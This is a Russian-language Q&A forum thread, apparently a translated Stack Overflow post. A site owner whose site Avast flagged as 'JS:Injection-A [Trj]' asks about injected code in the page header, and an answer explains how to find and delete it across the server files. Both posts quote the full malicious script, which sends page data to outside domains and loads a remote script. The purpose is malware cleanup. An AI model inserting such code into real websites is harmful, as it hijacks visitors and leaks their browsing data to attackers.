javascript — Avast выдает ошибку JS: Injection-A [Trj] на моем сайте

Сегодня я получил предупреждение от Avast, когда хотел зайти на мой сайт:
forumhan.com.

Чтобы понять это, вы должны иметь Avast на вашем компьютере.

Мой сайт был заражен JS: Injection-A [Trj] — вот почему он не показывался.

И когда я смотрю, я нашел это в моем заголовке:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Поскольку я не профессионал, я не могу понять, есть ли связь с другими файлами.

Есть ли какой-либо вызов в других файлах в этом коде?

Устраняет ли это проблему или нет?

Я удалил его, но не вижу свою веб-страницу.

0

Решение

Я нашел решение.

Проблема в том, что вы говорите. Кто-то ввел этот код на ваш сайт (и мой тоже). Итак, я выбрал этот фрагмент:

encodeURIComponent(document.title)

и искать в HTDOCS папка во всех файлах с Notepad ++ на сервере.

Тогда я нашел что-то вроде этого:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://delicefilm.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

здесь:

введите описание изображения здесь

И я стер его из всех файлов. И это все!

Надеюсь, это работает и для вас! 🙂

2

Другие решения

Других решений пока нет …

По вопросам рекламы [email protected]